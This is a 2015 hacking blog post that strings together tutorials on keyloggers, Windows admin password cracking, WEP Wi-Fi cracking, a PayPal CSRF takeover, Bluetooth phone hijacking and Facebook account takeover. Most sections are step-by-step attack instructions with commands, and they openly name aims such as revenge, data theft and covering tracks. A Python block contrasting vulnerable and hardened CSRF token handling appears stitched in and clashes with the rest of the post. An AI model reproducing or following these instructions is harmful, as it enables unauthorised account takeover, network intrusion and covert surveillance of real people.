Friday, 13 March 2015

Keylogger

A keylogger is a software program or hardware device used to monitor and log each key a user types on a computer keyboard. Whoever installed the program or device can then view everything that user typed. Because these programs and devices record every keystroke, the person controlling them can easily find user passwords and other information the user may not wish others to know.
Keyloggers, as a surveillance tool, are often used by employers to ensure employees use work computers for business purposes only. Unfortunately, keyloggers can also be embedded in spyware allowing your information to be transmitted to an unknown third party.


 About keyloggers

A keylogger is a program that runs in the background, recording all keystrokes. Once keystrokes are logged, they are hidden on the machine for later retrieval or shipped raw to the attacker. The attacker then peruses them carefully in the hope of finding passwords, or other useful information that could be used to compromise the system or in a social engineering attack. For example, a keylogger will reveal the contents of all e-mail composed by the user. Keyloggers are commonly included in rootkits.

A keylogger normally consists of two files: a DLL which does all the work and an EXE which loads the DLL and sets the hook. Therefore, when the hook is deployed on a system, both files must be present in the same directory.

There are other approaches to capturing information about what you are doing.

    * Some keyloggers capture screens, rather than keystrokes.
    * Other keyloggers will secretly turn on video or audio recorders, and transmit what they capture over your internet connection.

A keylogger might be as simple as an EXE and a DLL placed on a machine and invoked at boot via a registry entry. Or a keylogger could be a full-featured package that boasts features like these:

    * Stealth: invisible in process list
    * Includes kernel keylogger driver that captures keystrokes even when user is logged off (Windows 2000 / XP)
    * ProBot program files and registry entries are hidden (Windows 2000 / XP)
    * Includes Remote Deployment wizard
    * Active window titles and process names logging
    * Keystroke / password logging
    * Regional keyboard support
    * Keylogging in NT console windows
    * Launched applications list
    * Text snapshots of active applications.
    * Visited Internet URL logger
    * Capture HTTP POST data (including logins/passwords)
    * File and Folder creation/removal logging
    * Mouse activities
    * Workstation user and timestamp recording
    * Log file archiving, separate log files for each user
    * Log file secure encryption
    * Password authentication
    * Invisible operation
    * Native GUI session log presentation
    * Easy log file reports with Instant Viewer 2 Web interface
    * HTML and Text log file export
    * Automatic E-mail log file delivery
    * Easy setup & uninstall wizards
    * Support for Windows (R) 95/98/ME and Windows (R) NT/2000/XP

Tools:
Ardamax Keylogger is a keystroke recorder that captures the user's activity and saves it to an encrypted log file. The log file can be viewed with the powerful Log Viewer. Use this tool to find out what is happening on your computer while you are away, maintain a backup of your typed data automatically, or use it to monitor your kids. You can also use it as a monitoring device for detecting unauthorised access. Logs can be automatically sent to your e-mail address, and access to the keylogger is password protected. Besides that, Ardamax Keylogger logs information about the Internet addresses the user has visited.

This invisible spy application is designed for 2000, XP, 2003, Vista and Windows 7.

  • Security - allows you to protect program settings, Hidden Mode and Log file.

  • Application monitoring - keylogger will record the application that was in use that received the keystroke!

  • Time/Date tracking - it allows you to pinpoint the exact time a window received a keystroke!

  • Powerful Log Viewer - you can view and save the log as a HTML page or plain text with keylogger Log Viewer.

  • Small size – Ardamax Keylogger is several times smaller than other programs with the same features. It has no additional modules and libraries, so its size is smaller and the performance is higher.

  • Ardamax Keylogger fully supports Unicode characters which makes it possible to record keystrokes that include characters from Japanese, Chinese, Arabic and many other character sets.

  • It records every keystroke. Captures passwords and all other invisible text.

Other Features:

  • Windows 2000/2003/XP/Vista/Windows 7 support

  • Monitors multi-user machines

  • Automatic startup

  • Friendly interface

  • Easy to install

 Download Ardamax Keylogger (1.94Mb)

Perfect Keylogger for Windows 98/2000/XP/Vista and Windows 7
The latest, improved and stealthiest version of Perfect Keylogger is now available only after purchase. To protect the product from abuse and improve its quality for registered users, we no longer offer a trial version of the latest builds. The localized versions of Perfect Keylogger and the 64-bit version are also available after purchase. The last public version is still available, but keep in mind that it is not the latest and may be flagged by security software.

Download Perfect keylogger


 

Hack Windows Admin

Today, I am going to show you many aspects of the Windows password storage path, the method of encryption, and breaking into Windows by cracking the admin password. We need this often for many reasons:
1) Sometimes we have forgotten our old password and the hint isn't helping.
2) We want to break into someone's computer to get information.
3) We just want to take revenge on someone.
4) Stealing computer data.

Let's take a deep dive into cracking Windows passwords, including where they are stored and in which format.

SAM file and password hashes ~ the place where these passwords are stored as hashes:
Password hashes - When you type your password into a Windows NT, 2000, XP, Vista or Windows 7 login, Windows hashes your password using a specific scheme that turns it into something that looks like this:
    7524248b4d2c9a9eadd3b435c51404eddc5

This is a password hash. This is what is actually checked when you type your password in: Windows hashes what you typed and compares it against what is stored in the registry and/or SAM file.

You can try to crack this password hash at:
http://adf.ly/1A7mPE
http://adf.ly/1A7mSB

SAM file - Holds the user names and password hashes for every account on the local machine, or for the domain if it is a domain controller.

Location of the SAM/hashes:
You can find what you're looking for in several locations on a given machine.
It can be found on the hard drive in the folder %systemroot%\system32\config (i.e. C:\windows\system32\config). However, this folder is locked to all accounts, including Administrator, while the machine is running. The only account that can access the SAM file during operation is the "System" account.

The second location of the SAM, or the corresponding hashes, is the registry. It can be found under HKEY_LOCAL_MACHINE\SAM. This is also locked to all users, including Administrator, while the machine is in use. (Go to Run, type Regedit and hit Enter, then scroll to HKEY_LOCAL_MACHINE\SAM; however, you may not have access to it.)

So the two locations (there are some others) of the SAM/hashes are:
- %systemroot%\system32\config
- In the registry under HKEY_LOCAL_MACHINE\SAM

Cracking or breaking into the Admin account:
How to get hashes from the SAM file?
Well, below are the methods to do so:
1) The easiest way to do this is to boot your target machine into an alternate OS like NTFSDOS or Linux and just copy the SAM from the %systemroot%\system32\config folder.

It's quick, it's easy, and it's effective. You can get a copy of NTFSDOS from Sysinternals (http://www.sysinternals.com). The regular version of NTFSDOS is freeware, which is always nice, but only allows read-only access. This should be fine for what you want to do; however, if you're the kind of person that just has to have total control and has some money to burn, NTFSDOS Pro, also by Sysinternals, has read/write access but it'll cost you $299.

2) You can also get password hashes by using pwdump2 (Google it to get the software, or search at openwall.com). pwdump uses DLL injection in order to use the System account to view and get the password hashes stored in the registry. It then obtains the hashes from the registry and stores them in a handy little text file that you can paste into a password cracking utility like L0phtCrack or John the Ripper (the Linux-based one works well); Cain and Abel can also be used.

3) Import the hashes directly from L0phtCrack and let it crack them for you.


Obtained the hashes? Now crack them:
Well, as I have said, these can't be reversed, but well-known automated cracking software can be used to achieve the target. Yes, it is possible; all we need is a bit of patience. The software will try a lot of strings and compare their hashes against these; in short, it will recover them.

1) John the Ripper - John the Ripper is, to many, the old standby password cracker. It is command line, which makes it nice if you're doing some scripting, and best of all it's free and open source. The only real thing that JtR is lacking is the ability to launch brute force attacks against your password file. But look at it this way: even though it is only a dictionary cracker, that will probably be all you need. I would say that in my experience I can find about 85-90% of the passwords in a given file by using just a dictionary attack.

2) L0phtCrack - Probably the most wildly popular password cracker out there. L0phtCrack is sold by the folks at @Stake, and with a price tag of $249 for a single user license it sure seems like everyone owns it. This is probably the nicest password cracker you will ever see, with the ability to import hashes directly from the registry or pwdump, and dictionary, hybrid, and brute-force capabilities. No password should last long. Well, I shouldn't say "no password", but almost all will fall to L0phtCrack given enough time.

Making your own password in Windows:
Injecting password hashes into the SAM:
One of the easiest ways to gain Administrator privileges on a machine is by injecting your own password hashes into the SAM file. In order to do this you will need physical access to the machine and a brain larger than a peanut. Using a utility called "chntpw" by Petter Nordahl-Hagen you can inject whatever password you wish into the SAM file of any NT, 2000, or XP machine, thereby giving you total control; just burn the .iso to a disk and use it. I would give a tip like backing up the SAM file first by using an alternate OS. A Linux USB disk or a Windows live disk can also work. Go in, inject the password of your choosing, log in using your new password and do what you need to do. Then restore the original SAM so that no one will know that it was hacked.


You need to have admin access to perform this change from the command line. This is an especially handy trick if you want to change a password on an account but you've forgotten the original (going through the Control Panel can require confirmation of the old password).

Now we change the Admin password. To verify the user name, simply type net user and you get a list of all the user names on that Windows machine. Go to the command prompt and enter:

    cd\
    cd windows\system32
    net user

If there are people near you and you don't want them to see the password you type, enter net user with an asterisk in place of the password:

    E.g. > net user username *
         > Type a password for the user:
         > Confirm the password:



Another easy method, using Ophcrack to get into the Admin account:

Ophcrack is a Windows password cracker based on a time-memory trade-off using rainbow tables. This is a new variant of Hellman's original trade-off, with better performance. It recovers 99.9% of alphanumeric passwords in seconds.

This is a type of offline cracking. Just grab the .iso of Ophcrack from here, burn it and enjoy using it.
1. Ophcrack can crack passwords for Windows 7, Windows Vista, and Windows XP.
2. Ophcrack can recover 99.9% of passwords from Windows XP, usually in a matter of seconds. Any 14-character or smaller password that uses any combination of numbers, small letters, and capital letters should be crackable.
3. Ophcrack can recover 99% of passwords from Windows 7 or Windows Vista. A dictionary attack is used for Windows 7 and Vista.
4. The Ophcrack LiveCD option allows for completely automatic password recovery.
5. The LiveCD method requires no installation in Windows, making it a safe alternative to many other password recovery tools.
6. No Windows passwords need to be known to use the Ophcrack LiveCD to crack your Windows passwords.

Download

I think this Ophcrack method is far better. Try this one: just get a disk and write it, or else a USB disk can also be used.

Some security tips ~ making strong passwords:
Now you know how passwords can be cracked, so here are some tips for you.
1) Do not use common passwords like 123456 or your own name.
2) Use @, *, # or other symbols in your passwords to ensure maximum security. In this case John the Ripper, Ophcrack and other cracking tools may take a long time, which will be frustrating for the hacker.
3) Keep changing your password, so that if one hash takes a long time to crack, you have already generated another hash by the time it is cracked.


HACK WIFI BY BACKTRACK

Step 1:-

First Download Backtrack  from the following link:

CLICK HERE TO DOWNLOAD

Step 2:-

Burn the ISO image to a CD and boot your laptop from the CD drive.

Step 3:-

Select the third boot option(VESA/KDE).

Step 4:-

Once in BT3, click the tiny black box in the lower left corner to load up a "Konsole" window.

Step 5:-

Type the following command:

airmon-ng

Note down the interface name. In this example it is wifi0.

Step 6:-

airmon-ng stop wifi0

Step 7:-

ifconfig wifi0 down

Step 8:-

macchanger --mac 00:11:22:33:44:66 wifi0

Step 9:-

airmon-ng start wifi0

Step 10:-

airodump-ng wifi0

This will start populating Wi-Fi networks. Press Ctrl + C to stop.

Check for a network with WEP encryption.

Note down the BSSID, CH and ESSID somewhere in Notepad or on paper.

Note that if the same BSSID is also shown in the second part with a STATION associated with it, it means someone is accessing that network and our task will be a little easier.

If not, then don't worry, we will still crack it.

Step 11:-

airodump-ng -c (channel) -w (file name) --bssid (bssid) wifi0

Replace

(channel) with the CH which you had already noted

(file name) with any name of your choice

(bssid) with the BSSID which you had already noted

Leave this console as it is and start a new konsole.

Step 12:-

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:66 wifi0

If you don't get an "Association successful" message then keep on trying until you get success.

Step 13:-

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:66 wifi0

Well, if you don't see ARP ACK and sent packets are not increasing or still 0, then it means no one is accessing that network. But don't worry, you have got an optional step.

Leave this console as it is and start a new konsole.

Step 14:-

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid) -h 00:11:22:33:44:66 wifi0

Press y and Enter.

Now you will see that the ARP and ACK packets in the 2nd console are increasing fast.

Keep this console as it is and start a 4th console.

Step 15:-

aircrack-ng -b (bssid) (filename)-

Just wait and watch... Backtrack will do the rest of the work.

Hurray, we got the key.

Done..!!

 

 

HACK FACEBOOK ACCOUNT THROUGH PHISHING

Here we explain phishing and how we can protect ourselves from it.


>>WHAT IS PHISHING:-


The act of sending an e-mail to a user, falsely claiming to be an established legitimate enterprise, in an attempt to scam the user into surrendering private information that will be used for identity theft. The e-mail directs the user to visit a Web site where they are asked to update personal information, such as passwords and credit card, social security, and bank account numbers, that the legitimate organization already has. The Web site, however, is bogus and set up only to steal the user's information.

 



>>MOBILE PHISHING:

Phishing scams are not limited to the internet. Some phishers use the telephone to make requests for information. If you get a call from your banking institution asking for personal information, hang up and call your bank directly. Your bank will have your social security number and account information on file and should only ask you to verify a few digits.

Phishing also arrives by SMS, often pretending to be from brands like iPhone, Apple, iTunes and more.

EXAMPLE:-

>>Congratulations! Your mobile phone has won US$ 10 Million prize money. To claim your money, call this number XXXXXXXX,give your permanent address,pin number,account number or credit card number...

The phisher can ask for things like this; they want your personal information.

Some people reply to the phisher and then become the phisher's target, so never reply to these types of messages or mails.

 


In a phishing attack, the attacker creates a situation wherein people believe that they are dealing with an authorized party, like their bank or another service provider. The attacker will ask the victim for sensitive information such as credit card information.



>>Phishing attacks generally target:

    * Bank information – e.g. VISA and PayPal accounts.
    * Username and password information.
    * Social Security numbers.
    * Information which can be used to retrieve forgotten or lost credentials.


>>Follow the tips below to protect yourself against these threats:

· Your bank will never ask you to divulge account information or passwords via email. Never give out this information, especially via email.

· Don’t open emails that come from untrusted sources.

· Don’t run files that you receive via email without making sure of their origin.

· Don't click links in emails. If they come from a known source, type them into the browser's address bar. If they come from an untrusted source, simply ignore them, as they could take you to a website designed to download malware onto your computer.

· Keep your computer protected. Install a security solution and keep it up-to-date.


>>Protect yourself from Phishing scams that could lead to identity theft. I cannot stress this enough. Phishing scams are a hot topic lately that have grown with the popularity of online banking and social networking sites like MySpace, Facebook and Friendster.


The term phishing comes from the analogy to "fishing". The phisher uses bait to lure victims into giving out personal information like passwords and credit card numbers. The bait is typically an urgent plea from one of the victim's friends or trusted websites, asking for information to resolve some sort of problem with their account.


>>Anti-phishing software is a must for anyone that accesses the internet. Most of the internet service providers have some safety measures included as part of their online security software. Most web browsers also have add-ons that can detect most phishing scams. Unfortunately, these measures are not enough. Some of the more clever phishers have found ways to trick the anti-phishing software so you need to be cautious of suspicious emails and messages.

               

        HACK PAYPAL ACCOUNT



1- Reusable CSRF Token:
The CSRF token, which authenticates every single request made by the user and can be found in the request body of every request under the parameter name "Auth", changes with every request the user makes as a security measure. But after a deep investigation I found out that the CSRF Auth is reusable for that specific user email address or username. This means that if an attacker found any of these CSRF tokens, he could then perform actions on behalf of any logged-in user.
Hmm, it seems interesting but still not exploitable, as there is no way for an attacker to get the "Auth" value from a victim's session.

2- Bypassing the CSRF Auth System:
The CSRF Auth verifies every single request of that user. So what if an attacker who is "not logged in" tries to make a "send money" request? PayPal will ask the attacker to provide his email and password. The attacker provides the "victim's email" and ANY password, then captures the request. The request will contain a valid CSRF Auth token which is reusable and can authorise this specific user's requests. Upon further investigation, we found out that an attacker can obtain a CSRF Auth which is valid for ALL users by intercepting the POST request from a page that provides an Auth token before the login process; check this page for the magical CSRF Auth: "https://www.paypal.com/eg/cgi-bin/webscr?cmd=_send-money". At this point the attacker can CSRF "almost" any request on behalf of this user.



The application generates a valid "Auth" token for a logged-out user!
Through examination of the password change process, he found that an attacker can NOT change the victim's password without answering the security questions set by the user, and the user himself can NOT change the security questions without entering the password!

3- Bypassing the Security Questions Change:

The initial process of "setting" security questions is not password protected and is reusable.
After further investigation, he noticed that the request for setting up the security questions, which is initiated by the user while signing up, is not password-protected, and it can be reused to reset the security questions without providing the password. Hence, armed with the CSRF Auth, an attacker can CSRF this process too and change the victim's security questions.

At this point, an attacker can conduct a targeted CSRF attack against a PayPal user and take full control over his account. Hence, an attacker can CSRF all requests, including but not limited to:

1- Add/Remove/Confirm email address
2- Add fully privileged users to a business account
3- Change security questions
4- Change billing/shipping address
5- Change payment methods
6- Change user settings (notifications/mobile settings) ... and more.

To automate the whole process, Yasser has coded a Python interactive server to demonstrate how an attacker could exploit this vulnerability in a real-life attack scenario.
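The three findings above come down to one design flaw: the "Auth" token is tied to the account rather than to an authenticated session, and the security-question reset is not protected by the password. The following is an added illustration, not PayPal's code or Yasser's server: two hypothetical toy servers, one with the reusable token and one with a session-bound token plus step-up authentication, and a demo() that replays a token captured before login against both.

```python
import hmac
import hashlib
import secrets


class VulnerableServer:
    """Hypothetical model: one "Auth" token per account, not per session."""

    def __init__(self):
        self.secret = secrets.token_bytes(32)
        self.questions = {}

    def auth_token(self, username):
        # Same value for every request and session of this user, and it is
        # handed out before any password has been verified.
        return hmac.new(self.secret, username.encode(), hashlib.sha256).hexdigest()

    def set_security_questions(self, username, token, answers):
        if not hmac.compare_digest(token, self.auth_token(username)):
            return False
        self.questions[username] = answers  # no password check at all
        return True


class HardenedServer:
    """Hypothetical model: token bound to the session, change needs the password."""

    def __init__(self):
        self.secret = secrets.token_bytes(32)
        self.pw_hashes = {}   # username -> password hash (a real KDF belongs here)
        self.sessions = {}    # session id -> username
        self.questions = {}

    def register(self, username, password):
        self.pw_hashes[username] = hashlib.sha256(password.encode()).hexdigest()

    def _password_ok(self, username, password):
        digest = hashlib.sha256(password.encode()).hexdigest()
        return hmac.compare_digest(digest, self.pw_hashes.get(username, ""))

    def login(self, username, password):
        if not self._password_ok(username, password):
            return None
        sid = secrets.token_urlsafe(32)
        self.sessions[sid] = username
        return sid

    def auth_token(self, sid):
        if sid not in self.sessions:
            return None  # nothing is minted for unauthenticated requests
        return hmac.new(self.secret, sid.encode(), hashlib.sha256).hexdigest()

    def set_security_questions(self, sid, token, password, answers):
        username = self.sessions.get(sid)
        expected = self.auth_token(sid)
        if username is None or token is None or expected is None:
            return False
        if not hmac.compare_digest(token, expected):
            return False          # token from another session, or forged
        if not self._password_ok(username, password):
            return False          # step-up authentication for a sensitive change
        self.questions[username] = answers
        return True


def demo():
    """Replay a pre-login token against both models; returns four booleans."""
    vuln = VulnerableServer()
    captured = vuln.auth_token("victim@example.com")  # obtained while logged out
    replayed = vuln.set_security_questions("victim@example.com", captured, ["dog"])
    hard = HardenedServer()
    hard.register("victim@example.com", "correct horse")
    sid = hard.login("victim@example.com", "correct horse")
    token = hard.auth_token(sid)
    other = hard.auth_token(hard.login("victim@example.com", "correct horse"))
    cross = hard.set_security_questions(sid, other, "correct horse", ["dog"])
    no_pw = hard.set_security_questions(sid, token, "wrong", ["dog"])
    legit = hard.set_security_questions(sid, token, "correct horse", ["dog"])
    return replayed, cross, no_pw, legit
```

demo() returns (True, False, False, True): the reusable token lets the replayed reset succeed, while the hardened server rejects a token from another session of the same user and a request without the current password.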


     Mobile Bluetooth Hacking

Here is a list of what you can do once you have hacked the other phone. Have fun!

  • Read messages. (They are no longer personal!)

  • Read contacts. (Check your lover's phonebook to see under what name he/she has saved your number. Hey, please don't despair when you see he/she has saved your number as lover no. 9! HeHe)

  • Change Profile (Change the other’s profile to silent mode when you are on a date!)

  • Play Ringtone even if the phone is silent (Annoy your classmates!)

  • Play songs from the hacked phone in the same phone.

  • Restart the phone (Show some magic to your friends!)

  • Switch off the phone (Ultimate thing that you can do!)

  • Restore Factory Settings (Do this to the most organized one and run away quickly!)

  • Change Ringing Volume (You have enough experience how to use it. Don’t you?)

    Follow these steps to hack any Bluetooth-enabled mobile phone.

    1. Download Super Bluetooth Hack 1.8 and also check that your mobile is in the list of supported handsets from the link provided. After you have downloaded the .jar file, install it on your mobile.

    2. There is no need to install the software on the mobile which you want to hack.

    3. Turn on the Bluetooth of your handset and open the Super Bluetooth Hack application.

    4. Select the Connect option and then Inquiry Devices to search for any nearby mobile that has its Bluetooth turned on.

    5. Your friend's Bluetooth must also be turned on to be found. Pairing between the devices is also necessary sometimes.

    6. Once your friend's phone has been found, try out its functions!


     

 

Hack Facebook Account


We know that there are many techniques to hack a Facebook account, like phishing attacks, keylogging and other social techniques, but today we are going to see how to hack passwords using a new feature introduced by Facebook: the 3 Trusted Friends password recovery feature. What happens is that if you have lost your password and you don't have any access to your default email address, this feature comes in handy by sending a request to your 3 trusted friends and hence regaining your account password.
For this technique you need to create 3 fake Facebook accounts, and you must add these as friends on the victim's account, whose account you are going to hack.

After successfully adding your fake accounts as friends on the victim's account, follow the steps below:

1. Go to Facebook and click Forgot your Password ?



2. Then you will get something like the screen below; just enter the details you know about him: his username, email address and full name.



3. After entering everything check it again and click on search.


4. After a successful search for the user, Facebook will show some information about how many emails are linked to the account, and there is a simple option saying
"No Longer Access to These"; click that one.


5. Now it will prompt you to enter a new email address on which you will get the password resetting option, so enter your email address. I suggest creating a fake or temporary email address for safety purposes.


6. Then it will prompt you to enter the security answers. If you have some guess about them, that's ok, but if you don't know them, simply enter 3 wrong answers and it will take you to the 3 trusted friends recovery page like below.


7. Now just click Continue and Facebook will ask you to choose 3 trusted friends. Choose the 3 fake profiles which you created and added to the victim's account.
8. After selecting the 3 accounts, Facebook will send security codes to these accounts. Just enter these codes and you will get a password resetting email from Facebook on the account you created in Step 5.

That's it, now you have succeeded in hacking the Facebook password with the 3 Trusted Friends method.
